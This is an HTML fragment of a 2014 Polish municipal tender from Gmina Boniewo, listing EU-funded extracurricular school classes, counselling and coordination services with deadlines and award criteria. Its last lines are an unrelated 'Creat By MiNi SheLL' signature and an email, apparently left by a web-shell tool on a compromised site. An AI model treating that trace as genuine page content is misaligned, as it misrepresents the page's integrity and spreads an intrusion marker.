3) jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych  w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust.1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 

Warunkiem zmiany umowy będzie udokumentowany lub odpowiednio uzasadniony wniosek Stron umowy, a zmiana może nastąpić w przypadku, gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia, a druga Strona umowy wyrazi zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boniewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Boniewo ul. Szkolna 28, 87-851 Boniewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2014 godzina 09:00, miejsce: Urząd Gminy Boniewo ul. Szkolna 28, 87-851 Boniewo, osobiście sekretariat urzędu gminy Boniewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z  Programu Operacyjnego Kapitał Ludzki  w ramach  Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania  9.1. Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Podziałanie 9.1.2. Wyrównie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie  różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia  matematyczno-przyrodnicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia  matematyczno-przyrodnicze : 
Zajęcia matematyczno -przyrodnicze  z wykorzystaniem ICT (pierwszeństwo dla ucz. uzdolnionych) polegające na wyszukiwaniu i opracowywaniu (w formie prezentacji multimedialnej) zagadnień z biologii, chemii, fizyki, geografii  i matematyki:
-  2 grupy po 8 uczniów 1 h tygodniowo. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia z j. angielskiego  przeznaczone dla ucz. uzdolnionych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z j. angielskiego  przeznaczone dla ucz. uzdolnionych:
-3 grupy po 8 uczniów 1 h tygodniowo .Jedna z grup dla uczniów klasy III w celu przygotowania się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia koła informatycznego oraz prowadzenie i aktualizacji  strony internetowej szkoły i projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia koła informatycznego oraz prowadzenie i aktualizacji  strony internetowej szkoły i projektu:
 - 2 grupy po 8 uczniów 1 h tygodniowo..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Edukacja ekologiczna -warsztaty ekologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Edukacja ekologiczna -warsztaty ekologiczne dot. segregacji odpadów , sortowania odpadów, energii odnawialnej:
-4grupy  po 20 uczniów,  6h w semestrze. Przeprowadzenie ankiet przed i po realizacji zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedsiębiorczość -warsztaty z przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedsiębiorczość -warsztaty z przedsiębiorczości (gry, zabawy, filmy dydaktyczne), wizyty w zakładach pracy(3x 20 os), spotkania z przedsiębiorcami(3x), opracowanie biznesplanu i reklamy :
- 3grupy po 20 uczniów w wymiarze 25h(1 grupa na  1 semestr). Test z podstaw przedsiębiorczości  po pierwszych i po ostatnich zajęciach , ankieta wyrównawcza przed i po realizacji zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadomość kulturalna - Warsztaty teatralne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadomość kulturalna - Warsztaty teatralne(zakończone przedstawieniem dla uczniów i rodziców):
- 1grupa ,  25 uczniów w wymiarze  30h , 1 godz. tygodniowo . Przeprowadzenie ankiet przed i po realizacji zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Tożsamość regionalna i wychowanie patriotyczne  -warsztaty rękodzieła ludowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tożsamość regionalna i wychowanie patriotyczne  -warsztaty rękodzieła ludowego:
- 1grupa ,  20 uczniów w wymiarze 15h .Przeprowadzenie ankiet przed i po realizacji zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Doradztwo zawodowe -  w ramach zadania będą realizowane będą realizowane:
-Zajęcia indywidualne dla uczniów kl.III wspomagające świadome planowanie drogi edukacyjnej i zawodowej -30 uczniów, 2 h na 1 ucznia (60h) w okresie od kwietnia 2014 do 27.06.2014
Dla każdego ucznia  uczestniczącego w tym zadaniu powstanie indywidualny scenariusz edukacyjno - zawodowy. Wykonanie kart doradztwa , scenariusz edukacyjno-zawodowy na zakończenie realizacji zajęć, ankieta porównawcza po pierwszym i ostatnim doradztwie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Działanie Szkolnego Ośrodka Kariery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie Szkolnego Ośrodka Kariery-33 ucz. klas III oraz inni zainteresowani uczniowie z kl. I i II w wymiarze 5 h tygodniowo (1h dziennie)w okresie od 01.09.2014 do 26.06.2015
Dla każdego ucznia  uczestniczącego w tym zadaniu powstanie indywidualny scenariusz edukacyjno - zawodowy. Bloki tematyczne  realizowane w ramach SzOK:
- psychologiczne aspekty aktywizacji zawodowej,
- poznaje zawody,
-Kierunki dalszego kształcenia-przygotowanie uczniów do poruszania się po rynku szkół ponadgimnazjalnych
Ponadto każdy uczeń będzie brał udział w konsultacjach indywidualnych. Wykonanie kart doradztwa , scenariusz edukacyjno-zawodowy na zakończenie realizacji zajęć, ankieta porównawcza po pierwszym i ostatnim doradztwie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia wyrównawcze  z chemii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z chemii- 2 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia wyrównawcze z j.angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z j.angielskiego-3 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia wyrównawcze z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z matematyki -3 grupy po 8 uczniów 1 h tygodniowo. Jedna grupa dla uczniów klasy III przygotowujących  się do egzaminu gimnazjalnego. Sprawdzian wiedzy po pierwszych i ostatnich zajęciach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia z języka polskiego dla uczniów z opinią o dysleksji rozwojowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z języka polskiego dla uczniów z opinią o dysleksji rozwojowej-1 grupa,  8 uczniów 1 h tygodniowo. opinie pedagogów /wychowawców  bezpośrednio po zajęciach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia specjalistyczne dla uczennicy niedowidzącej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia specjalistyczne dla uczennicy niedowidzącej-1grupa  1 uczennica  1h tygodniowo. opinie pedagogów /wychowawców  bezpośrednio po zajęciach ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Koordynator szkolny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynator szkolny - 28 godzin w miesiącu: monitoring na poziomie szkoły, w tym wizyty monitorujące na zajęciach i kontrola frekwencji, kontrola i obsługa logistyczna zajęć, spotkań i wycieczek, rekrutacja uczniów, promocja, tworzenie harmonogramów zajęć, przygotowanie danych do wniosku o płatność, współpraca przy opracowaniu raportu końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com